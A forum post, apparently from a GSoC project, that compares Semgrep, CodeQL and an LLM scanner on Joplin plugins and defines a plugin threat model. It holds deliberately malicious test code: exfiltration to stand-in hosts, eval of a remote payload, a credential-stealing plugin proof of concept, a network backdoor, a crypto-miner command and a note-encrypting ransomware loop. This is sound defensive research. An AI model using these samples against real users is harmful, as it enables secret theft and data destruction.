Plugin Security Tool Comparison -- CodeQL, Semgrep & Gemini CLI

akshajrawat · 30 May 2026 18:19

Hi, as part of my GSoC work I ran three static analysis tools across a set of Joplin plugins to see how well each one detects malicious behavior. Here's what I found.

The Tools

CodeQL is GitHub's semantic analysis engine. It's powerful but requires writing QL queries and building a database per repo - the highest setup cost of the three.

Semgrep is a pattern-based scanner that runs YAML rules against source code. It's the easiest to plug into a CI pipeline and the fastest to get running.

Gemini 3.1 pro preview CLI is Google's AI-assisted tool. It reads the code and produces a structured security report with a risk score and verdict. No custom rules needed.

Testing:

Semgrep Scan - `joplin-plugin-jarvis`

No custom rules were written; everything the scanner found came from its own default rules.

File	Rule	Line	Issue
`src/commands/chat.ts`	Non-literal RegExp	274	`new RegExp(nc, 'g')` - dynamic regex built from variable, vulnerable to ReDoS
`src/commands/chat.ts`	Non-literal RegExp	274	`new RegExp(prompt_override)` - same line, second dynamic argument flagged
`src/commands/notes.ts`	Unsafe format string	157	``console.debug(`Skipping note ${noteId}`)`` - variable in log string
`src/models/models.ts`	Unsafe format string	726	``console.info(`Jarvis: Loaded ${this.embeddings.length}...`)`` - variable in log string
`src/research/papers.ts`	Unsafe format string	296	``console.debug(`Error processing paper ${i}`)`` - variable in log string
`src/research/wikipedia.ts`	Unsafe format string	169	``console.debug(`Error processing Wikipedia page ${i}`)`` - variable in log string
`src/utils.ts`	Non-literal RegExp	182	`new RegExp(patterns.join(''), 'is')` - dynamic regex from joined array, vulnerable to ReDoS

Observation:
The "Unsafe format string" findings are all false positives, produced by the javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring rule. Excluding that rule removed these alerts.
The "Non-literal RegExp" findings could make the plugin vulnerable to ReDoS, but that is not the kind of malicious behavior we are looking for either. They come from the javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp rule.
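The same exclusion can also be applied after the scan, on Semgrep's JSON output. The following is a minimal sketch, assuming the report was produced with `semgrep --json` and that only the `check_id`, `path`, and `start.line` fields are needed; the sample findings and the short `eval-detected` ID are hypothetical stand-ins, not real scan output.

```typescript
// Minimal shape of the fields used from Semgrep's JSON results (assumption: other fields ignored).
interface SemgrepResult {
  check_id: string;
  path: string;
  start: { line: number };
}

// Rule IDs judged out of scope for malicious-plugin detection (taken from the observation above).
const EXCLUDED_RULES: ReadonlySet<string> = new Set([
  "javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring",
  "javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp",
]);

// Drop findings produced by excluded rules; keep everything else untouched.
function dropExcluded(results: SemgrepResult[]): SemgrepResult[] {
  return results.filter((r) => !EXCLUDED_RULES.has(r.check_id));
}

// Hypothetical sample findings, loosely modelled on the tables in this post.
const sample: SemgrepResult[] = [
  {
    check_id: "javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring",
    path: "src/commands/notes.ts",
    start: { line: 157 },
  },
  {
    check_id: "javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp",
    path: "src/utils.ts",
    start: { line: 182 },
  },
  { check_id: "eval-detected", path: "src/vulnerabilities.ts", start: { line: 18 } },
];

const kept = dropExcluded(sample);
console.log(kept.map((r) => `${r.path}:${r.start.line}`));
```

Filtering after the fact keeps the raw report intact, which can help if an excluded rule later turns out to matter.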

After excluding both rules, I ran the scan again on plugin-conflict-resolution, this time with custom malicious test code added to it:

File	Rule	Line	Issue
`src/vulnerabilities.ts`	`react-insecure-request`	17	Unencrypted request over HTTP detected (`axios.get('http://malicious.com/code.js')`).
`src/vulnerabilities.ts`	`eval-detected`	18	Detected the use of `eval()`. May be a code injection vulnerability.
`src/vulnerabilities.ts`	`react-insecure-request`	27	Unencrypted request over HTTP detected (`fetch('http://malicious.com/steal-db')`).
`src/vulnerabilities.ts`	`react-insecure-request`	43	Unencrypted request over HTTP detected (`axios.post('http://malicious.com/steal-notes')`).
`src/vulnerabilities.ts`	`weak-symmetric-mode`	49	Weak cryptographic mode detected (`createCipheriv('aes-256-cbc')`). Recommend AES-256-GCM.
`src/vulnerabilities.ts`	`react-insecure-request`	68	Unencrypted request over HTTP detected (`fetch('http://malicious.com/exfiltrate-export')`).

The scanner is still running purely on its built-in rules. It caught a few of the things it should catch but missed many. Here is what it caught and what it missed:

Threat Category	Code / Attack Mechanism	Scanner Status	Why it happened
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Caught	Flagged by `react-insecure-request`, which fires on plain `http://` URLs. The requests were caught because they were unencrypted, not because the scanner recognized them as exfiltration.
Remote Code Execution	`eval(remoteCode.data)`	Caught	Flagged by `eval-detected`. The scanner knows that executing dynamic strings is a massive security risk.
System Command Execution	`child_process.exec('curl... bash')`	Missed	Default Node.js rulesets ignore this because legitimate backend web servers use it all the time.
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed	Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders.
Network Backdoor	`net.createServer(...)`	Missed	Standard Node web apps create servers, so the tool assumes it is safe behavior.
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed	The scanner has no knowledge of Joplin's custom API or what `joplin.data.put` does.
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed	The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods.

These observations show two things:

Semgrep is completely unaware of the Joplin APIs.
Semgrep is completely unaware that the code it is scanning belongs to a plugin. The plugin is written in TS/JS, but it should not do everything ordinary Node.js code does, such as fs.readFileSync and fsExtra.removeSync (reading and deleting files) or child_process.exec('curl... bash') (running system commands). Even if a plugin does these things for a good reason, they should be flagged once so the human reviewer can check what the code is actually doing.
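To make the "flag it once for the reviewer" idea concrete, here is a minimal sketch of a line-based check for the Node.js calls named above. It is a plain regex pass, not a Semgrep or CodeQL rule; the `flagForReview` helper, the pattern list, and the sample plugin source are all assumptions made for illustration.

```typescript
interface ReviewFlag {
  line: number;
  api: string;
}

// Node.js capabilities that are normal in a server but worth one review flag in a plugin.
const SENSITIVE_APIS: ReadonlyArray<[string, RegExp]> = [
  ["child_process.exec", /\bchild_process\.exec\s*\(/],
  ["fs.readFileSync", /\bfs\.readFileSync\s*\(/],
  ["fsExtra.removeSync", /\bfsExtra\.removeSync\s*\(/],
  ["net.createServer", /\bnet\.createServer\s*\(/],
];

// Report every line that calls one of the sensitive APIs (1-based line numbers).
function flagForReview(source: string): ReviewFlag[] {
  const flags: ReviewFlag[] = [];
  source.split("\n").forEach((text, i) => {
    for (const [api, pattern] of SENSITIVE_APIS) {
      if (pattern.test(text)) flags.push({ line: i + 1, api });
    }
  });
  return flags;
}

// Hypothetical plugin source used only to exercise the check.
const pluginSource = [
  "import * as child_process from 'child_process';",
  "const notes = await joplin.data.get(['notes']);",
  "child_process.exec('curl... bash');",
  "fsExtra.removeSync(target);",
].join("\n");

const reviewFlags = flagForReview(pluginSource);
console.log(reviewFlags);
```

A check like this says nothing about intent. It only guarantees that the call shows up in the report, which is the point of a review-by-default pipeline.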

CodeQL Scan - `joplin-plugin-jarvis`

As with Semgrep, no custom rules were written for CodeQL; it ran with its default queries only.

File	Rule	Line	Issue
`models/openai.ts`	Incomplete URL substring sanitization	19	`'azure.com'` can be anywhere in the URL, and arbitrary hosts may come before or after it.
`models/openai.ts`	Incomplete URL substring sanitization	26	`'api.anthropic.com'` can be anywhere in the URL, and arbitrary hosts may come before or after it.
`utils.ts`	Bad HTML filtering regexp	374	This regular expression does not match script end tags like `</script>`.
`research/pubmed.ts`	Double escaping or unescaping	381	This replacement may produce `&` characters that are double-unescaped.
`research/wikipedia.ts`	Incomplete multi-character sanitization	125	This string may still contain `<script`, which may cause an HTML element injection vulnerability.
`utils.ts`	Incomplete multi-character sanitization	373	This string may still contain `<style`, which may cause an HTML element injection vulnerability.
`utils.ts`	Incomplete multi-character sanitization	373	This string may still contain `<script`, which may cause an HTML element injection vulnerability.

RESULT: In short, CodeQL gave better findings than Semgrep. But every result outside the models/ folder was XSS-related, which Laurent has explicitly said we are not looking for.
The two findings in the models/ folder are SSRF-related and could be useful, since a user can trick the app by including 'azure.com' or 'api.anthropic.com' in a custom malicious URL.
Still, this is not "malicious" behavior by the Jarvis plugin itself, so it is not useful for us.
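For readers unfamiliar with the "Incomplete URL substring sanitization" finding, the sketch below contrasts a substring check with a hostname check. It is not the Jarvis code; both function names and both sample URLs are hypothetical.

```typescript
// The pattern CodeQL flags: the trusted domain may appear anywhere in the URL.
function looksLikeAzureBySubstring(url: string): boolean {
  return url.includes("azure.com");
}

// Stricter check: parse the URL and compare the hostname only.
function isAzureHost(url: string): boolean {
  try {
    const host = new URL(url).hostname;
    return host === "azure.com" || host.endsWith(".azure.com");
  } catch {
    return false; // not a valid absolute URL
  }
}

const crafted = "https://evil.example/azure.com/v1"; // hypothetical attacker-controlled URL
const genuine = "https://myresource.openai.azure.com/v1"; // hypothetical legitimate URL

console.log(looksLikeAzureBySubstring(crafted), isAzureHost(crafted));
console.log(looksLikeAzureBySubstring(genuine), isAzureHost(genuine));
```

The crafted URL passes the substring check because 'azure.com' sits in its path, while the hostname check rejects it.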

After excluding the XSS and SSRF rules from CodeQL's default rules, I ran the scan on plugin-conflict-resolution, again with the custom malicious test code added:

File	Vulnerability	Line	Issue
`lib/codemirror/mode/markdown/markdown.js`	Inefficient regular expression	549	This part of the regular expression may cause exponential backtracking on strings starting with 'a -=' and containing many repetitions of '= -='.
`vulnerabilities.ts`	Download of sensitive file through insecure connection	17	Download of sensitive file from HTTP source.

"Inefficient regular expression" is also a ReDoS case which we are not actually looking for.
So, out of all the added code, CodeQL flagged:

Threat Category	Code / Attack Mechanism	CodeQL Status	Why it happened
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Missed	CodeQL did not recognize the outgoing POST/GET requests as unauthorized data leaks.
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught	Flagged as "Download of sensitive file through insecure connection". CodeQL caught the dangerous HTTP download, though it ignored the `eval()` itself.
System Command Execution	`child_process.exec('curl... bash')`	Missed	Default Node.js rulesets ignore this because legitimate backend web servers use it all the time.
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Missed	Reading and deleting files is standard Node.js behavior. The scanner doesn't know plugins shouldn't do this to system folders.
Network Backdoor	`net.createServer(...)`	Missed	Standard Node web apps create servers, so the tool assumes it is safe behavior.
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Missed	The scanner has no knowledge of Joplin's custom API or what `joplin.data.put` does.
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Missed	The scanner is completely blind to Joplin-specific plugin architecture and data-passing methods.

These observations also show two things:

CodeQL is completely unaware of the Joplin APIs.
CodeQL is completely unaware that the code it is scanning belongs to a plugin and should not do everything ordinary TS/JS code may do.

Further architecture analysis :

Any Joplin plugin can call joplin.settings.globalValues() with no restrictions and retrieve all sync credentials, the E2E master password, and the API token, using only the official plugin API, with zero exploits or sandbox escapes.

import joplin from "api";

joplin.plugins.register({
  onStart: async function () {
    const result = joplin.settings.globalValues([
      "sync.5.password",
      "sync.6.password",
      "sync.8.password",
      "sync.9.password",
      "sync.10.password",
      "encryption.masterPassword",
      "api.token",
      "encryption.passwordCache",
    ]);

    joplin.data.post(["notes"], null, {
      title: "test note for hacker",
      body: JSON.stringify(await result),
    });
  },
});

Additionally, a plugin developer can get access to both the master key and the master password:

First I tried joplin.data.get(['master_keys']), which is the defined way to get the master keys, but it was blocked by a regex filter that does not allow "_" in path segments:

for (const p of path) {
    if (!this.pathSegmentRegex_.test(p)) {
          throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
     }
}

So I read "syncInfoCache" instead. That worked, and I got the key and the master password.
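The path filter quoted above can be reproduced in isolation. This is a minimal sketch, assuming the regex is `^[a-z0-9]+$` (inferred only from the error message, not copied from the Joplin source); `assertValidPath` and `isAllowed` are hypothetical helper names.

```typescript
// Assumed pattern, inferred from the error text "lowercase letters and digits".
const pathSegmentRegex = /^[a-z0-9]+$/;

// Mirrors the loop quoted above: reject the whole path if any segment fails the regex.
function assertValidPath(path: string[]): void {
  for (const p of path) {
    if (!pathSegmentRegex.test(p)) {
      throw new Error(`Path segments must only contain lowercase letters and digits: ${JSON.stringify(path)}`);
    }
  }
}

// Convenience wrapper that turns the exception into a boolean.
function isAllowed(path: string[]): boolean {
  try {
    assertValidPath(path);
    return true;
  } catch {
    return false;
  }
}

console.log(isAllowed(["notes"]), isAllowed(["master_keys"]));
```

The filter only guards data API paths. A settings key such as "syncInfoCache" is read through joplin.settings and never passes through this check, which is why the second route worked.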

I believe Joplin settings and plugins currently work on the assumption that "if a user has installed a plugin, they trust it", i.e. the plugin gets access to all defined settings. Since we are moving from a trust-by-default to a review-by-default model, it would be good to have a flag for this specific bypass.
A plugin can read a secret and silently send it out through a network request without the user ever knowing, or it can read both the key and the password of the user.

Update to threat model :

What it is: The plugin attempts to read or extract the application's Master Password, Master Encryption Keys, or Sync Target Credentials regardless of the API path used. Because plugins operate in a trusted environment, extracting these assets constitutes a compromise of the user's privacy and must be flagged for review.

Known Attack Vectors:

Calling joplin.settings.globalValue or globalValues explicitly targeting "syncInfoCache", "encryption.masterPassword", "sync.*.password", "api.token", "encryption.cachedPpk", or "encryption.passwordCache" should be flagged once for review.
Additionally, if the data is read and sent to a network request, saved silently to a note, written to the local file system, passed to a system command (child_process), or injected into an external webview, it should be marked as critical and a must-review case.
If a plugin fetches both "encryption.masterPassword" and the encryption key, it should also be marked for review.
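The two severity levels described above can be sketched as a small classifier. This is only an illustration under stated assumptions: "*" is taken to mean exactly one dot-separated segment, `classifyRead` and `patternToRegex` are hypothetical helpers, and whether the value reaches a sink is passed in as a boolean rather than computed by real data flow analysis.

```typescript
// Key patterns taken from the attack-vector list above; "*" stands for one dot-separated segment.
const SENSITIVE_KEY_PATTERNS = [
  "syncInfoCache",
  "encryption.masterPassword",
  "sync.*.password",
  "api.token",
  "encryption.cachedPpk",
  "encryption.passwordCache",
];

// Turn a pattern into an anchored regex, escaping everything except the "*" wildcard.
function patternToRegex(pattern: string): RegExp {
  const escaped = pattern
    .split("*")
    .map((part) => part.replace(/[.+?^${}()|[\]\\]/g, "\\$&"))
    .join("[^.]+");
  return new RegExp(`^${escaped}$`);
}

const SENSITIVE_KEY_REGEXES = SENSITIVE_KEY_PATTERNS.map(patternToRegex);

type Severity = "none" | "review" | "critical";

// "review" for any read of a sensitive key, "critical" when the value also reaches a sink
// (network request, note, file system, child_process, external webview).
function classifyRead(key: string, reachesSink: boolean): Severity {
  const sensitive = SENSITIVE_KEY_REGEXES.some((re) => re.test(key));
  if (!sensitive) return "none";
  return reachesSink ? "critical" : "review";
}

console.log(classifyRead("sync.10.password", false)); // sensitive read without a sink
console.log(classifyRead("api.token", true)); // sensitive read that reaches a sink
console.log(classifyRead("editor.fontSize", true)); // hypothetical non-sensitive key
```

Deciding `reachesSink` is the hard part in practice, and it is exactly where flow-aware tools and pattern matchers differ.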

Threat Model :

All of the above observations show the need to write custom rules for the tools and to define a threat model that tells the tools what we have to detect.
Since human review is a mandatory part of the pipeline, the threat model has to cover both "this is bad" and "this may be bad" scenarios, so the reviewer knows what to review.
Tools by themselves do not know what a person wants to see flagged in the code. Through the custom rules / threat model, we tell the tool which things to flag so that the human reviewer can read the report in the issue and quickly check them.
Below is the threat model I have defined so far, with the reason why each item should be flagged:

(This model is actively under development and new things are being added and old ones are being updated regularly)

Phase 1: Critical Threats

Dynamic Code Execution: The plugin downloads a hidden script from the internet and executes it dynamically. Attack Vectors: Usage of eval() or bypassing joplin.require to use native require('child_process') with remote payloads.
Secret & Key Theft: The plugin attempts to read the application's Master Password, Encryption Keys, or Sync Credentials. Attack Vectors: Calling joplin.settings.globalValue(s) targeting syncInfoCache, encryption.masterPassword, encryption.cachedPpk, encryption.passwordCache, sync.*.password, sync.*.auth, sync.*.context, sync.5.username, sync.6.username, sync.9.username, sync.10.username, sync.10.userEmail, sync.userId, or clientId. This is critical if the data is piped to a network request, written to disk, passed to child_process, or injected into an external webview.
Electron Main Process Takeover: Gaining direct access to the main Electron process to control the app window or bypass renderer restrictions. Attack Vectors: Any import or requirement of @electron/remote.
Archive Extraction Attack: Using maliciously crafted zip files to overwrite sensitive files outside the intended directory, silently replacing database.sqlite or config files. Attack Vectors: Usage of joplin.fs.archiveExtract() where either argument originates from user input or a remotely fetched source. This should be flagged so a reviewer can see what the zip extraction is actually doing.
Mass Data Destruction & Silent Corruption: Iterating through notes/folders to permanently destroy the database, or silently corrupting note content (e.g., word replacement, date shifting). Attack Vectors: joplin.data.delete() inside loops, or joplin.data.put() modifying note body text. The scanner must track execution queues or detached background workers (e.g., arrays populated in UI event hooks but processed later) designed to evade direct flow analysis.
Keylogging & Silent Surveillance: Silently monitoring everything a user reads or types in real-time and exfiltrating it. Attack Vectors: onNoteContentChange or onNoteChange combined directly with network requests (fetch, axios).
Unauthorized FS Access & Self-Modification: Bypassing official APIs to read/rewrite core configs (database.sqlite), or rewriting its own source files after installation to swap code for malware. Attack Vectors: Usage of native fs or joplin.require('fs-extra') targeting __dirname + '/index.js' or ~/.config/joplin-desktop.
Network Backdoors: Opening a listening port on the user's local network. Attack Vectors: Usage of net.createServer().
Clipboard Hijacking: Rapidly reading the clipboard to find sensitive data + swapping it. Attack Vectors: Background loops calling joplin.clipboard.readText() and joplin.clipboard.writeText().
Native Binary & Cryptojacking: Dynamically downloading/unpacking compiled binaries, spawning miners, or using Web Workers for crypto-mining. Attack Vectors: Exploiting Node.js integration via child_process or hidden BrowserWindows.
Native Module Imports: Bypassing the joplin.require() API to gain full host machine access. Attack Vectors: Direct imports of child_process, net, os, dgram via require(), window.require(), or TypeScript import statements.
Silent Data Persistence & Sync Smuggling: Storing execution commands, or using the user's sync target as a stealthy exfiltration channel. Attack Vectors: Reading joplin.data.userDataSet() and executing the data obtained from it, or reading joplin.data.get(['notes']) and copying the contents into a note's invisible userDataSet.
UI Phishing & Credential Harvesting: Mimicking official Joplin or general authentication dialogs to steal user credentials. Attack Vectors: Usage of joplin.views.dialogs.setHtml or joplin.views.panels.setHtml containing <input type="password"> or fake branding. This is a critical threat if the resulting formData is piped to a network request.
Resource Exhaustion & Quota DoS: Intentionally degrading database performance or exhausting disk/cloud storage quotas. Attack Vectors: Asynchronous loops generating massive amounts of junk entities like joplin.data.post(['tags']) or generating large binary resources via fs.writeFileSync. The scanner must flag infinite loops utilizing setInterval, setTimeout, or recursive Promise-based sleep utilities.
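As an illustration of the Archive Extraction Attack item in the list above, here is a minimal sketch of the path check a reviewer would expect around any extraction. It does not describe how joplin.fs.archiveExtract() behaves; `staysInside` is a hypothetical helper and the directory and entry names are made up.

```typescript
import * as path from "path";

// True when `entryName`, resolved against `destDir`, stays strictly inside `destDir`.
function staysInside(destDir: string, entryName: string): boolean {
  const root = path.resolve(destDir);
  const target = path.resolve(root, entryName);
  const rel = path.relative(root, target);
  if (rel === "" || path.isAbsolute(rel)) return false;
  // Reject anything that climbs out of the destination directory.
  return rel !== ".." && !rel.startsWith(".." + path.sep);
}

const dest = "/tmp/plugin-data"; // hypothetical extraction directory
console.log(staysInside(dest, "notes/a.md"));
console.log(staysInside(dest, "../../.config/joplin-desktop/database.sqlite"));
```

An archive entry that fails this check is the classic sign of a crafted zip, so an extraction call without a comparable guard deserves a closer look.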

Phase 2: Dual-Use Data Flows

Command Execution: Running terminal commands via child_process. Attack Vectors: Data flowing into shell execution. The reviewer must verify if it is a legitimate tool or a malicious script.
Data Exfiltration: Using joplin.data.get to bulk-read notes and piping that data into fetch() or axios. Attack Vectors: Note data flowing to network. The reviewer must verify the destination URL.
Mass Encryption / Ransomware: A flow combining note reading, cryptographic modules, and overwriting the originals. Attack Vectors: joplin.data.get piped to joplin.data.put via crypto. The reviewer must verify whether this is a legitimate encryption feature.
Silent Backup Hijacking: Registering a custom export format while secretly piping the plaintext data to an external server. Attack Vectors: fetch() or network requests inside a joplin.interop.registerExportModule callback.
Malicious Import Module: Registering a custom import format that injects malicious notes, corrupts the database, or drops payload files. Attack Vectors: Malicious payloads inside a joplin.interop.registerImportModule callback.
Remote Webviews & Side-Channel Requests: Creating a UI panel explicitly tied to an external URL, or dynamically injecting user data in the url to bypass network monitoring. Attack Vectors: <iframe src="..."> in panel HTML, or injecting <img src="..."> where the URL path contains encoded user data or credentials.

False Positive:

Several Phase 2 items are dual-use by nature and will flag legitimate plugins (e.g., child_process for Python integrations, fetch + data.get). This is intentional. Phase 2 exists precisely because human review is mandatory. The LLM scanner is prompted to consider context before flagging, reducing noise compared to rule-based tools.

Note: This threat model consists mostly of data flows, so it is no longer practical to express it as custom Semgrep rules. At the end of the SAST section I have included a small study that specifically tests why Semgrep cannot be used anymore.
Also, a few new threats were added after the initial testing, so the tests below were run against slightly less threat model coverage.

Here is the report CodeQL generated on `plugin-conflict-resolution` with the custom malicious code:

Vulnerability / Rule	Description	Severity	File	Position (Line:Col)
Unauthorized Native Module Bypasses	Detects direct imports of 'child_process', bypassing the safe 'joplin.require' method.	warning	`/vulnerabilities.ts`	2:8 - 2:25
Network Backdoors	Detects local servers being spun up which may indicate a backdoor.	warning	`/vulnerabilities.ts`	30:20 - 33:6
Data Exfiltration (Notes to Network)	Detects Joplin notes data flowing to external network requests.	warning	`/vulnerabilities.ts`	43:58 - 43:62
Direct File System / Sandbox Escape	Detects hardcoded sensitive paths or traversals flowing into file system APIs.	warning	`/vulnerabilities.ts`	26:36 - 26:41
Secret and Key Theft	Detects sensitive environment variables or settings data exfiltrated via network requests.	warning	`/vulnerabilities.ts`	22:17 - 22:65

CodeQL generated a good report, was also able to catch cross-file code, and gave the exact lines to look at. The threat model seems to work well, as it improved the CodeQL results a lot:

Threat Category	Code / Attack Mechanism	Status
Data Exfiltration	`fetch()` / `axios` to `malicious.com`	Caught
Remote Code Execution	`axios.get` + `eval(remoteCode.data)`	Caught
System Command Execution	`child_process.exec('curl... bash')`	Caught
Destructive File Access	`fs.readFileSync` & `fsExtra.removeSync`	Caught
Network Backdoor	`net.createServer(...)`	Caught
Joplin API: Ransomware	`joplin.data.put` (encrypting existing notes)	Caught
Joplin API: Malicious Interop	`joplin.interop.registerExportModule`	Caught

(It returned clean for jarvis)

RESULT :

CodeQL gave good results once it was told what to look for. However, as seen earlier, CodeQL was not able to identify most of the things we want to see without the custom rules. This means it is now bound to the threat model when generating the report: mostly, the only things we will see in the report are those in the threat model, leaving a huge zero-day blind spot.

LLM as a scanner :

An LLM would be a great tool to use here, as the main problems with the other tools are the lack of context about what the Joplin plugin API actually is and the need to define a threat model to write custom rules for.
Since many Joplin plugins are made by community developers, the threat model can be defined now, but new things that a reviewer would want to see in the report will keep arising in the future.
An LLM is not bound to any rule or threat model. Although the threat model will be included in the prompt, LLMs are also good enough to report zero-day malicious code.

The scan result from gemini 3.1 pro preview with threat model defined on joplin-plugin-jarvis :

The scan result from gemini 3.1 pro preview with threat model defined on plugin-conflict-resolution with custom malicious code :

Threat Category	Code / Attack Mechanism	LLM Status
Data Exfiltration	`joplin.data.get` -> `axios.post()`	Caught
Remote Code Execution	`axios.get()` + `eval()`	Caught
System Command Execution	`child_process` (`curl... bash`)	Caught
Secret & Key Theft	`process.env` -> `fetch()`	Caught
Sandbox Escape / File Access	`fs` (SQLite) / `fs-extra` (absolute)	Caught
Network Backdoor	`net.createServer().listen(1337)`	Caught
Joplin API: Ransomware	Read -> `crypto.createCipheriv` -> Put	Caught
Joplin API: Malicious Interop	`registerExportModule` -> `fetch()`	Caught

The threat model seems to be working correctly: the well-known joplin-plugin-jarvis, which is not malicious, was not flagged as malicious, while the use of fetch() after joplin.notes.get was flagged so a human reviewer can check that nothing is wrong.
Additionally, the LLM is not bound to only the threat model. It looks at the code and checks whether there is anything else that should be flagged, similar to what the threat model defines.

More observations :

Why were these tests done?

To verify whether the threat model generates any noise and, if so, whether that noise is useful and should be added to the threat model.
Additionally, the LLM was used to scan and see whether plugins use any flow that should be added to the threat model.

The four most popular plugins all passed the LLM and CodeQL scans with a clean result:
Note: The LLM was also free to look for malicious code patterns similar to those in the threat model.

joplin-inline-todo Clean
joplin-rich-markdown Clean
plugin-templates Clean
plugin-yesyoukan Clean

CodeQL produced a little noise on plugin-templates:

Issue / Rule	Severity	File Location	Description
Useless regular-expression character escape	Error	`/parser.ts` (Line 211, Col 48, Col 63)	The escape sequence `\S` is equivalent to just `S`. Prepending a backslash to an ordinary character in a string does not have any effect.

This is a code quality finding from the "useless-regexp-character-escape" rule, which is now excluded from the rules.
Tests:
joplin-math-mode Clean
joplin-note-tabs Clean
joplin-plugin-extra-editor-settings Clean
joplin-plugin-quick-links Clean
joplin-inline-tags-plugin Clean
joplin-plugin-combine-notes Clean
joplin-plugin-diff-tool Clean
joplin-plugin-table-formatter Clean

New updates to threat model after these testings :

Self-Modifying Code / Silent Payloads: The plugin uses fs or fs-extra to rewrite its own source files (e.g., overwriting __dirname + '/index.js') after installation to swap code for malware, bypassing initial CI scans.
Cryptojacking / Resource Theft: Exploiting Node.js integration to use child_process to spawn native mining binaries, or using Web Workers in the hidden BrowserWindow to run crypto-miners in the background.

With all the rules written, I made a file containing dummy code for every rule scenario to check how both CodeQL and the LLM would perform:

import joplin from 'api';
import * as child_process from 'child_process';
import * as net from 'net';
import * as crypto from 'crypto';

const fs = joplin.require("fs-extra");

export async function codeql_test_dynamic_code_execution() {
    const response = await fetch('https://example.com/payload.js');
    const payload = await response.text();
    eval(payload); 
}

export async function codeql_test_secret_theft() {
    const masterPassword = await joplin.settings.globalValue('encryption.masterPassword'); 
    const syncCache = await joplin.settings.globalValue('syncInfoCache');

    await fetch('https://example.com/exfiltrate', {
        method: 'POST',
        body: JSON.stringify({ p: masterPassword, s: syncCache })
    });
}

export async function codeql_test_unauthorized_fs_access() {
    const pluginDir = __dirname; 
    const targetFile = `${pluginDir}/index.js`; 
    fs.writeFileSync(targetFile, "console.log('malware swapped');"); 
}

export async function codeql_test_network_backdoors() {
    const server = net.createServer((c) => { 
        c.write('backdoor active\r\n');
    });
    server.listen(8124); 
}

export async function codeql_test_clipboard_hijacking() {
    const clipContent = await joplin.clipboard.readText(); 
    if (clipContent.includes('wallet')) {
        await joplin.clipboard.writeText('attacker_wallet_address'); 
    }
}

export async function codeql_test_cryptojacking() {
    child_process.exec('xmrig -o pool.minexmr.com:4444 -u wallet_addr'); 
}

export async function codeql_test_command_execution() {
    const userCmd = "ls -la";
    child_process.exec(userCmd); 
}

export async function codeql_test_data_exfiltration() {
    const notes = await joplin.data.get(['notes']); 
    await fetch('https://example.com/sync', {
        method: 'POST',
        body: JSON.stringify(notes) 
    });
}

export async function codeql_test_mass_encryption() {
    const notes = await joplin.data.get(['notes']); 
    for (const note of notes.items) {
        const cipher = crypto.createCipheriv('aes-256-cbc', 'key', 'iv');
        let encrypted = cipher.update(note.body, 'utf8', 'hex');
        encrypted += cipher.final('hex');
        await joplin.data.put(['notes', note.id], null, { body: encrypted }); 
    }
}

export async function codeql_test_backup_hijacking() {
    await joplin.interop.registerExportModule({
        format: 'custom',
        description: 'Custom Export',
        target: fs.Directory,
        isNoteArchive: false,

        onInit: async (context: any) => {
            const data = context.exportData;
            await fetch('https://example.com/steal_backup', { method: 'POST', body: data });
        },

        onProcessItem: async (context: any, itemType: number, item: any) => {},
        onProcessResource: async (context: any, resource: any, filePath: string) => {},
        onClose: async (context: any) => {}
    });
}

export async function codeql_test_remote_webviews() {
    const htmlContent = `<iframe src="https://example.com/remote_app"></iframe>`; 
    const view = await joplin.views.panels.create('panel_1');
    await joplin.views.panels.setHtml(view, htmlContent); 
}

Result :

#	Threat	Phase	Maliciousness	LLM Scan	CodeQL
1	Dynamic Code Execution	1	Critical	Caught	Caught
2	Secret & Key Theft	1	Critical	Caught	Caught
3	Unauthorized FS / Self-Modification	1	Critical	Caught	Caught
4	Network Backdoor	1	Critical	Caught	Caught
5	Clipboard Hijacking	1	Critical	Caught	Caught
6	Cryptojacking / Binary Dropping	1	Critical	Caught	Caught
7	Command Execution	2	High	Caught	Caught
8	Data Exfiltration (notes → network)	2	High	Caught	Caught
9	Mass Encryption / Ransomware	2	High	Caught	Caught
10	Silent Backup Hijacking	2	High	Caught	Caught
11	Remote Webview Scripts	2	Medium	Caught	Caught

Originally, only the LLM caught all the threats. The CodeQL rules were nearly useless and caught only 3 of the 11 threats. Several changes had to be made before CodeQL caught all of them.

Trade-offs: CodeQL is not good at following complex data flows, such as data being extracted, placed into an object, and then passed through JSON.stringify. Here CodeQL lost track of the data and did not know that the new object contained the data we were following.

What had to be done to solve it? Several new rules were added and old rules were updated to simply check:

Do data.get() and fetch appear in the same function?
Do data.get(), a crypto call, and joplin.data.put() appear in the same file?
Is there a fetch() or file write inside a registerExportModule callback?
etc.
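The first check in the list above is a co-occurrence test rather than real taint tracking. The sketch below shows the idea in plain TypeScript; it is not the CodeQL query itself. `splitFunctions` is a deliberately naive, hypothetical helper that only handles `function name(...) {` declarations, and the fixture is modelled on the test file earlier in this post.

```typescript
interface FunctionBody {
  name: string;
  body: string;
}

// Naive splitter: finds `function name(...) {` and walks braces to the matching `}`.
// It does not account for braces inside strings or comments, which a real parser would.
function splitFunctions(source: string): FunctionBody[] {
  const out: FunctionBody[] = [];
  const header = /function\s+(\w+)\s*\([^)]*\)\s*\{/g;
  let m: RegExpExecArray | null;
  while ((m = header.exec(source)) !== null) {
    const bodyStart = header.lastIndex;
    let depth = 1;
    let i = bodyStart;
    while (i < source.length && depth > 0) {
      if (source[i] === "{") depth++;
      else if (source[i] === "}") depth--;
      i++;
    }
    out.push({ name: m[1], body: source.slice(bodyStart, i - 1) });
    header.lastIndex = i; // continue searching after this function
  }
  return out;
}

const READS_NOTES = /joplin\.data\.get\s*\(/;
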